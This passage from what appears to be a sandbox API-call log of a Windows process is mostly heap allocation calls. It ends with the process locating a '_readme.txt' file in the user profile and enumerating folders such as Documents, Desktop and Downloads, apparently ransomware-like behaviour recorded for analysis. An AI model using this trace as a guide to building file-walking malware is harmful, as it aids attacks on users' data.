hHeap=0x2c0000) returned 1 [0184.539] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.540] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0184.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.540] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.541] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.542] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.545] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.546] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.547] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.552] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.553] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.556] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0184.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.556] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0184.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0184.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.557] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0184.557] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.557] PathFindFileNameW (pszPath="") returned="" [0184.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0184.557] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0184.558] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0184.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2ade6e0 [0184.558] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0184.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac3dd0 [0184.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.558] FreeLibrary (hLibModule=0x759a0000) returned 1 [0184.558] PathAppendW (in: pszPath="C:\\Users\\kEecfMwgj\\", pMore="_readme.txt" | out: pszPath="C:\\Users\\kEecfMwgj\\_readme.txt") returned 1 [0184.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0184.558] PathFileExistsW (pszPath="C:\\Users\\kEecfMwgj\\_readme.txt") returned 1 [0184.559] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0184.559] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\*" (normalized: "c:\\users\\keecfmwgj\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe5b54690, ftLastAccessTime.dwHighDateTime=0x1d8a8d3, ftLastWriteTime.dwLowDateTime=0xe5b54690, ftLastWriteTime.dwHighDateTime=0x1d8a8d3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0184.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0184.560] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe5b54690, ftLastAccessTime.dwHighDateTime=0x1d8a8d3, ftLastWriteTime.dwLowDateTime=0xe5b54690, ftLastWriteTime.dwHighDateTime=0x1d8a8d3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.560] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0184.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0184.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a68 [0184.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ea0 [0184.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05ab0 [0184.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a68 | out: hHeap=0x2c0000) returned 1 [0184.561] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0184.561] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d70450, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d70450, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d70450, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0184.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0184.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40630 [0184.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x38) returned 0x2a05de8 [0184.561] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0184.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05ab0 | out: hHeap=0x2c0000) returned 1 [0184.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.562] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0184.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40630 | out: hHeap=0x2c0000) returned 1 [0184.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40160 | out: hHeap=0x2c0000) returned 1 [0184.563] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f6e20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0184.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05ab0 [0184.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a68 [0184.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x54) returned 0x29b9ed0 [0184.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05b88 [0184.563] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0184.563] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0184.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0184.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05de8 | out: hHeap=0x2c0000) returned 1 [0184.564] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0184.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a68 | out: hHeap=0x2c0000) returned 1 [0184.564] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05ab0 | out: hHeap=0x2c0000) returned 1 [0184.564] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d70450, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d70450, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d70450, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0184.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05ab0 [0184.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a68 [0184.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0184.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05bd0 [0184.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0184.565] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0184.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05b88 | out: hHeap=0x2c0000) returned 1 [0184.565] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40160 | out: hHeap=0x2c0000) returned 1 [0184.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0184.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0184.566] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0184.566] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a68 | out: hHeap=0x2c0000) returned 1 [0184.567] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05ab0 | out: hHeap=0x2c0000) returned 1 [0184.567] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x981b85c0, ftLastAccessTime.dwHighDateTime=0x1d8a8d3, ftLastWriteTime.dwLowDateTime=0x981b85c0, ftLastWriteTime.dwHighDateTime=0x1d8a8d3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0184.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05ab0 [0184.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a68 [0184.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa8) returned 0x29edc48 [0184.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05b88 [0184.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40160 [0184.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05b40 [0184.567] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c60 [0184.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05bd0 | out: hHeap=0x2c0000) returned 1 [0184.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0184.568] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a059d8 | out: hHeap=0x2c0000) returned 1 [0184.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0184.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0184.569] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0184.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a68 | out: hHeap=0x2c0000) returned 1 [0184.569] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05ab0 | out: hHeap=0x2c0000) returned 1 [0184.569] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x9b0246b0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0x9b0246b0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0184.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05ab0 [0184.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a68 [0184.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a059d8 [0184.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a68 | out: hHeap=0x2c0000) returned 1 [0184.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05ab0 | out: hHeap=0x2c0000) returned 1 [0184.570] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e833eb0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0184.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05ab0 [0184.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a68 [0184.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xfc) returned 0x2f5b18 [0184.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05bd0 [0184.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0184.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05af8 [0184.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05c18 [0184.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x301078 [0184.571] RtlAllocateHeap 